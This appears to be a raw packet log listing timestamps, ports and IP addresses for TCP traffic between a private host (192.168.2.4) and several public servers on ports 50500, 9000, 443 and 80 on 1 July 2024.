Jul 1, 2024 09:16:24.077482939 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:24.267092943 CEST	49756	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:24.507419109 CEST	9000	49767	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:24.507585049 CEST	49767	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:24.510525942 CEST	49764	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:24.511100054 CEST	49769	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:24.515719891 CEST	9000	49764	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:24.515794992 CEST	49764	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:24.515850067 CEST	9000	49769	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:24.515997887 CEST	49769	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:24.520845890 CEST	49769	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:24.525585890 CEST	9000	49769	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:24.685416937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:24.685492992 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:24.724570036 CEST	443	49768	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:24.724668980 CEST	443	49768	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:24.724752903 CEST	49768	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:24.724858046 CEST	49768	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:24.724874020 CEST	443	49768	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:24.852247000 CEST	49772	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:24.852284908 CEST	443	49772	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:24.852472067 CEST	49772	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:24.852839947 CEST	49772	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:24.852854013 CEST	443	49772	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:24.923353910 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:24.928560019 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:24.928621054 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:25.196006060 CEST	9000	49769	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:25.196077108 CEST	49769	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:25.197679996 CEST	49769	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:25.199760914 CEST	49769	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:25.202589035 CEST	9000	49769	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:25.204653978 CEST	9000	49769	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:25.330204010 CEST	443	49772	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:25.330291986 CEST	49772	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:25.333314896 CEST	49772	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:25.333324909 CEST	443	49772	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:25.333559990 CEST	443	49772	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:25.335053921 CEST	49772	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:25.335345030 CEST	49772	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:25.335372925 CEST	443	49772	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:25.335459948 CEST	49772	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:25.335469007 CEST	443	49772	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:25.867404938 CEST	9000	49769	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:25.867434025 CEST	9000	49769	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:25.867453098 CEST	9000	49769	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:25.867479086 CEST	49769	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:25.867499113 CEST	49769	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:25.869250059 CEST	49767	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:25.870259047 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:25.874485970 CEST	9000	49767	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:25.874558926 CEST	49767	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:25.875041008 CEST	9000	49773	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:25.875097990 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:25.875475883 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:25.880410910 CEST	9000	49773	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:26.156954050 CEST	443	49772	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:26.157077074 CEST	443	49772	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:26.157885075 CEST	49772	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:26.231694937 CEST	49772	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:26.231731892 CEST	443	49772	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:26.500652075 CEST	49774	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:26.500685930 CEST	443	49774	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:26.500751019 CEST	49774	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:26.501646042 CEST	49774	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:26.501660109 CEST	443	49774	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:26.528182030 CEST	9000	49773	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:26.528295994 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:26.528860092 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:26.533600092 CEST	9000	49773	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:26.554896116 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:26.559701920 CEST	9000	49773	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:26.990447998 CEST	443	49774	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:26.990525961 CEST	49774	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:26.991878033 CEST	49774	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:26.991888046 CEST	443	49774	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:26.992150068 CEST	443	49774	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:26.993496895 CEST	49774	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:26.993643999 CEST	49774	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:26.993669033 CEST	443	49774	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:27.110898972 CEST	49756	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:27.116162062 CEST	50500	49756	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:27.116252899 CEST	49756	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:27.185765028 CEST	9000	49773	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:27.185808897 CEST	9000	49773	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:27.185827017 CEST	9000	49773	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:27.185831070 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.185864925 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.185887098 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.185902119 CEST	9000	49773	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:27.185918093 CEST	9000	49773	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:27.185942888 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.185954094 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.187869072 CEST	49769	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.188427925 CEST	49776	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.193294048 CEST	9000	49776	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:27.193367004 CEST	49776	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.194570065 CEST	49776	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.196691990 CEST	9000	49769	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:27.196753025 CEST	49769	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.199450016 CEST	9000	49776	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:27.383826971 CEST	443	49774	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:27.383945942 CEST	443	49774	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:27.384161949 CEST	49774	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:27.384191036 CEST	49774	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:27.419929981 CEST	49777	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:27.419974089 CEST	443	49777	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:27.420309067 CEST	49777	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:27.420677900 CEST	49777	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:27.420696020 CEST	443	49777	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:27.868948936 CEST	9000	49776	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:27.869195938 CEST	49776	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.899203062 CEST	49776	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.902128935 CEST	49776	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:27.906948090 CEST	9000	49776	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:27.910326958 CEST	9000	49776	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:28.036612988 CEST	443	49777	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:28.036737919 CEST	49777	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:28.056183100 CEST	49777	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:28.056204081 CEST	443	49777	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:28.056447983 CEST	443	49777	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:28.058105946 CEST	49777	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:28.058243990 CEST	49777	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:28.058252096 CEST	443	49777	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:28.426837921 CEST	9000	49776	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:28.426892042 CEST	49776	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:28.713264942 CEST	443	49777	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:28.713363886 CEST	443	49777	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:28.713597059 CEST	49777	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:28.744508028 CEST	49777	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:28.744530916 CEST	443	49777	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:29.503633022 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:29.504224062 CEST	49778	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:29.509449959 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:29.509531021 CEST	49778	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:29.509531975 CEST	9000	49773	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:29.509577990 CEST	49773	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:29.519819975 CEST	49778	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:29.525851965 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.177102089 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.177174091 CEST	49778	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:30.177839041 CEST	49778	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:30.180727959 CEST	49778	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:30.180808067 CEST	49778	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:30.183450937 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.186469078 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.186480045 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.186489105 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.186497927 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.186506987 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.186614037 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.186628103 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.186636925 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.217359066 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.217392921 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.217463017 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.217910051 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.217921972 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.456793070 CEST	49776	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:30.457737923 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:30.461841106 CEST	9000	49776	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.462019920 CEST	49776	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:30.463601112 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.463704109 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:30.466111898 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:30.470840931 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.683842897 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.683940887 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.699770927 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.699791908 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.700014114 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.702361107 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.710011005 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.710046053 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.710143089 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.710180998 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.710306883 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.710341930 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.710458040 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.710489988 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.710617065 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.710650921 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.710928917 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.710958958 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.710972071 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.710985899 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.711158037 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.711186886 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.711205959 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.711359978 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.711390018 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.721344948 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.721412897 CEST	49781	443	192.168.2.4	188.114.97.3
Jul 1, 2024 09:16:30.721436024 CEST	443	49781	188.114.97.3	192.168.2.4
Jul 1, 2024 09:16:30.908610106 CEST	9000	49778	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:30.908706903 CEST	49778	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.119026899 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.119157076 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.119792938 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.121473074 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.124525070 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.126197100 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.453732967 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.453773022 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.453783035 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.453783035 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.453815937 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.453823090 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.453838110 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.453850031 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.453860998 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.453874111 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.453883886 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.453913927 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.454026937 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.454037905 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.454047918 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.454063892 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.454071999 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.454081059 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.454106092 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.459323883 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.459376097 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.459475040 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.459511995 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.460527897 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.460732937 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.481869936 CEST	49786	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:31.486706018 CEST	50500	49786	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:31.487131119 CEST	49786	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:31.502865076 CEST	49786	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:31.507666111 CEST	50500	49786	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:31.545285940 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.545337915 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.545526028 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.545574903 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.551593065 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.551635027 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.551646948 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.551673889 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.551692963 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.555088043 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.555125952 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.555131912 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.555135965 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.555169106 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.561857939 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.561868906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.561878920 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.561928988 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.561955929 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.568821907 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.568834066 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.568844080 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.568907976 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.568943977 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.575476885 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.575486898 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.575498104 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.575553894 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.575582981 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.578373909 CEST	49787	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:31.582401037 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.582420111 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.582432032 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.582458973 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.582478046 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.583201885 CEST	50500	49787	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:31.583293915 CEST	49787	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:31.589282036 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.589330912 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.589338064 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.589342117 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.589373112 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.589389086 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.596179008 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.596232891 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.596244097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.596263885 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.596283913 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.600368023 CEST	49787	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:31.603321075 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.603375912 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.603425980 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.603444099 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.605339050 CEST	50500	49787	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:31.636234999 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.636250973 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.636265039 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.636286974 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.636313915 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.642272949 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.642303944 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.642313957 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.642327070 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.642330885 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.642352104 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.642379045 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.642426014 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.642508030 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.649497032 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.649508953 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.649519920 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.649568081 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.649606943 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.649863958 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.649929047 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.653027058 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.653048038 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.653064013 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.653070927 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.653090000 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.653104067 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.660973072 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.661020041 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.661489010 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.661499977 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.661510944 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.661545038 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.661576033 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.668596029 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.668658018 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.668659925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.668672085 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.668709040 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:31.673635006 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.673646927 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:31.673659086 CEST	9000	49782	195.201.251.214	192.168.2.4
